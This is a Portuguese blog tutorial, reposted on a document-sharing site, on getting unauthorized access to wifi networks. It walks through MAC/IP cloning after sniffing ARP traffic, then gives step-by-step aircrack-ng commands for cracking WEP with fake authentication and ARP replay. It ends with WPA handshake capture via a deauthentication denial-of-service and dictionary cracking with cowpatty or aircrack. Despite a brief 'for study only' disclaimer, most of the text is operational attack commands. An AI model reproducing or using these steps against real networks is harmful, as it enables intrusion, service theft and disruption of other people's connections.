Você está na página 1de 12

[Tutorial] Descobrir IP - MAC - WEP - WPA

Venho aqui fazer este tutorial mostrando como nossas redes de internet wifi so frgeis e facilmente so invadidas, possibilitando assim que usem nossa internet sem permisso! Vou mostra aqui algumas tcnicas de conectar em redes aberta ou protegidas, este tutorial e apenas para estudo, para que possamos proteger nossas redes contra ataques deste tipo, no me responsabilizo por mau uso destas tcnicas, lembrando que furto de sinal de internet crime com Pena de deteno, de trs meses a um ano, e multa, por isso seja consciente do que voc esta fazendo!

Bom vamos comear!

conectando em rede sem proteo no Windows Redes sem proteo = estas redes so facilmente invadidas pois geralmente voc s tem que saber um ip valido na rede para scanea-la e obter um ip e mac validos

Windows Primeiro conecte na rede normalmente

Bom como no sabemos nem mac nem ip de um cliente para conectar, vamos ter que conseguir, para isso vamos usar um programa chamado

wireshark! Wireshark http://www.easy-share.com/1904123477...etup-1.0.0.exe Instale o wireshark, depois de instalar vamos capturar alguns pacotes para pegar os dados, Abram o wireshark, click em show the capture options

Vai aparecer uma janela com algumas configuraes: Faa as seguintes modificaes: 1 - Em interface, escolha seu dispositivo wifi,(placa pci,usb,etc...), no meu caso atheros AR5005G 2 - Desmarque a opo: capture packets in promscuos mode 3 - Clique em start!

Vai comear a captura, capture alguns pacotes, at que voc consiga pacotes ARP (ficam destacados na cor azul claro).

Depois de capturar alguns pacotes, pare a captura, v em filter e escreva ARP (em aspas). Vai filtrar no por pacotes ARP!

Veja na figura abaixo os possveis dados que encontramos,

Bom agora temos ip, gateway, e mac. Precisamos ainda da mascare de rede e dns Mascara de rede = geralmente a mascara de rede 255.255.255.0 ou 255.0.0.0 ou 255.255.255.252 Dns = a dns voc pode tentar capturar igual voc fez com o ip, usando o wireshark, mas geralmente todas as redes funcionam usando os dns pblicos, o dns que eu uso e 200.176.2.10 Pronto agora temos todos os dados em mos, precisamos clonar o mac address, Baixem o programa a-Mac Address Change http://www.easy-share.com/1904125843... ZANZIBA00.rar Instale-o normalmente, o registre com o serial que vem junto com ele. Abra o programa 1 = escolha a interface a qual voc quer trocar o mac, no meu caso a

atheros ar5005g 2 = neste campo digitem o mac que voc capturou no wireshark, (obs. sem os :) 3 = click em change mac to, click em yes , e yes novamente, o PC vai reiniciar

Pronto, agora e s ir s propriedades de conexo / protocolo tcp/ip / propriedades e adicionar ip, gateway, mascara de rede e dns que voc j tem, click em ok e pronto!

Notas, depois que voc conectar na rede e estiver navegando na internet, atravs do a-Mac Address Change voc pode conseguir mais macs e ips, e apenas clicando em scan, aparecero todos os ip que estiverem conectados na rede.

-----------------------------------------------------------------------------------------------Agora vamos quebrar a wep no linux que em minha opinio e muito mais fcil do que no Windows, alem do que tem um suporte muito maior a modo monitor, pois muitas placas s entram em modo monitor no linux.

wifislax 3.1 ftp://files.tuto-fr.com:8080/distro/wifislax-3.1.iso Bom minha placa e uma atheros AR5005G Existem varias distros de linux, no vou entrar em detalhes de como instalar os programas, pois iria levar muito tempo, se voc tem dificuldade em instalar programas no linux, baixe um live CD de auditoria em redes wifi, eu vou usar o wifislax 3.1 1 - vamos abrir uma janela do Shell Vamos a os comandos, estes comandos so digitados 1 a 1, e sem o #, que no caso seria wifislax#... 2 - vamos trocar o mac para 00:11:22:33:44:55 #ifconfig ath0 down #ifconfig ath0 hw ether 00:11:22:33:44:55 #ifconfig ath0 up

3 - vamos colocar a placa em modo monitor #wlanconfig ath0 destroy #modprobe -r ath_pci #modprobe ath_pci autocreate=monitor

4 - vamos usar o airodump para capturar os pacotes .ivs para quebrar a wep com o aircrack, e preciso de pelo menos 400 mil pacotes, (este numero pode variar, mas aqui eu precisei disso) Legenda do comando usado abaixo -W = entrada por nome de pacote wep = nome do pacote de captura

--dssid = mac do ap que voc quer quebra a wep -c = canas do ap que voc quer quebrar a wep ath0 = interface da minha placa, eu s tenho placa atheros, ai no sei se varia para outros modelos e marcas Comando #airodump-ng --ivs -w wep --bssid 00:00:00:00:00 -c 10 ath0 Ai ira comear a captura, lembrando que aqui eu precisei de 400 mil pacotes,

5 - voc tem como agilizar a captura usando uma autentificao falsa Legenda do comando usando abaixo: -1 = autentificao falsa 0 = tempo em segundos da reassociao -e = entrado do nome do ap que voc vai quebra wep -a = mac do ap que voc quer quebrar a wep -h = mac de um cliente que autenticou l no airodump

Comando: #aireplay-ng -1 0 -e apvitima -a 00:00:00:00:00 -h 00:00:00:00:00 ath0

6 - rejeio de arp Legenda do comando usado abaixo: -3 = repetio padro do pedido do arp -b = mac do ap que voc quer quebrar a wep -h = mac de um cliente que autenticou la no airodump

Comando: #aireplay-ng -3 -b 00:00:00:00:00 -h 00:00:00:00:00 ath0

Bom depois de alcanar os 400 pacotes feche o airodump e o aireplay 7 - agora vamos quebrar a wep com o aircrack Abra o sheel Legenda do comando usado abaixo: -a = fora modalidade de ataque -1 = wep esttica -0 = aplica cores no aircrack -n = especifica o tamanho da key, sendo de 64,128,256 bits Wep-01.ivs = o pacote que capturamos no airodump , cujo nome posto foi wep, e que por padro o programa adiciona -01, ento se voc por exemplo colocou Maria como nome da captura no airodump vai ficar assim, Maria-01.ivs Comando #aircrack-ng -a 1 -0 -n 64 wep-01.ivs

Pronto voc quebrou a wep no linux ------------------------------------------------------------------------------------------

Bom agora vou mostrar aqui como quebrar a wep no Windows, o Windows e muito ruim para quebrar wep, mas em todo causo ai vai explicao. Estou usando uma atheros

Lembrando que voc tem que instalar o driver de modo monitor de sua placa wifi Aqui fica o driver da minha! http://www.easy-share.com/1904125957..._ZANZIBA00.rar Bom vamos l Voc no pode esta conectado em nenhuma rede, certifica se disso, pois se no sei PC pode reiniciar. Baixe a sute aircrack e salve com um nome fcil no c:\

aircrack download = http://www.easyshare.com/1904126085..._ZANZIBA00.rar Aqui eu salvei com o nome de wep V pasta bin e abra o airodump-ng

Agora vamos configurar o airodunp 1 = known network adapters: aqui voc ira escolher sua interface de rede (placa pci, usb, etc...) no meu caso e atheros ar5005g, que indicada pelo numero 11. 2 = network interface index nunber: coloque o numero indicado pela interface de rede, no caso 11. 3 = interface types: e o chipset da interfase, no meu caso atheros, que indicado pela letra a. 4 = channel(s): indica o numero do canal do ap que voc quer quebrar

a wep, no meu caso 11. 5 = output file name prefix: o nome que vai ficar salvo o arquivo .ivs, no meu caso coloquei wep 6 = only write wep ivs: coloque y

Ai vai comear a captura, capture cerca de 400 mil pacotes. Depois de ter capturado alguns pacotes vamos quebrar a wep V no iniciar executar e digite cmd No prompt digite C:\wep\bin\aircrack-ng -n64 wep.ivs Legenda do comando acima -n = tamanho da chave wep 64/128/256 wep.ivs = nome que voc deu a captura de arquivos no airodump

Pronto aqui esta a chave de wep

--------------------------------------------------------------------------------------------------

aqui vc vai ver como quebrar wpa com linux, este tutorial eu ainda no tive a chance de testar, por falta de rede com wpa aqui, ele no meu, creditos a o jedai vamos la Este procedimento foi usado com o Live CD Wifislax Aps colocar sua placa em modo monitor faa o seguinte: 1) #airodump-ng ath0 Mostra todos os Aps disponveis, MAC dos Aps, canal, informaes que precisamos. Ath0 = Neste caso a interface da minha placa wireless, verifique qual o seu com o comando: #ifconfig 2) #airodump-ng b XX:XX:XX:XX:XX:XX c 11 w nomedoarquivo ath0 -b = Captura de trfego no MAC do Ap especificado -c = Expecifica o canal do Ap em questo -w = Sada do arquivo.Vai gerar um arquivo nomedoarquivo.cap 3) #aireplay-ng -0 30 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY ath0 Lanamos um ataque de negao de servio.No passo (2) vai dar para vc identificar um ou mais clientes associados, anote o MAC de um deles, fica assim:

-0 = Ataque de negao de servio 30 = Faz a solicitao 30 vezes.Voc pode mudar o valor se quiser. -a = Endereo MAC do AP -c = Endereo MAC do cliente pelo qual voc quer desassociar 4)#aircrack-ng nomedoarquivo.cap Esse um momento importante.WAP utiliza um protocolo que se chama handshake, Ou seja, qdo voc tenta se conectar ao Ap o handshake se encarrega de verificar se a senha est correta, e retorna a solicitao. Quando lanamos o ataque de negao de servio, o cliente foi automaticamente obrigado a enviar nova solicitao (com a chave que precisamos ... Deve aparecer algo como: # BSSID.............................ESSID........... ......................Encryption 1....XX:XX:XX:XX:XX:XX......nome do Ap.............WPA (1 handshake) Tem que aparecer WPA (1 handshake) e no WPA (0 handshake).Vai dando negao e tentando at conseguir. 5) #genpmk -f wordlist -d hashfile-ratinho -s nome do Ap Lanamos ento genpmk para gerar um arquivo hashfile que um arquivo que contm a to sonhada senha WAP. -f = Especifica a entrada da sua wordlist 6) #cowpatty -r nomedoarquivo-01.cap -d hasfile-nomedoarquivo -s nome do Ap Uma vez gerado o hasfile, lanamos cowpatty que nos dar a preciosa senha, aparecer algo assim: Cowpatty 4.0 WPA-PSK dictionary attack . jwright@hasborg.com

Collected all necessary data to mount crack against WPA/PSK passpharase Starting dictionary athack. Please be patient. The PSK is 00112233 Preste atenao, se no der a senha, no desanime, no precisa repetir todo o procedimento pois voc j tem o arquivo com a senha lembra (ratinho-01.cap e hasfile-ratinho ). Pegue uma outra wordlist e recomece do item (4) em diante. Esses procedimentos foram realizados no Wifislax, nele j vem o cowpatty. Se na sua distribuo no tiver o cowpatty pode instalar ou fazer o seguinte: A partir da negao de servio (Item 3) #aircrack-ng -a 2 -0 -w wordlist.lst nomedoarquivo-01.cap -a = Fora modulo de ataque 2 = WPA/WPA2-PSK -0 = Aplica cores -w = Incremento de dicionrio Acho esse mtodo at mais fcil, da para ver em tempo real passando as senhas da wordlist, tudo bem colorido.

Ler mais: http://teckboard.blogspot.com/2009/08/tutorial-descobrir-ip-macwep-wpa.html#ixzz1SjBAZc50 Under Creative Commons License: Attribution Non-Commercial No Derivatives

Você também pode gostar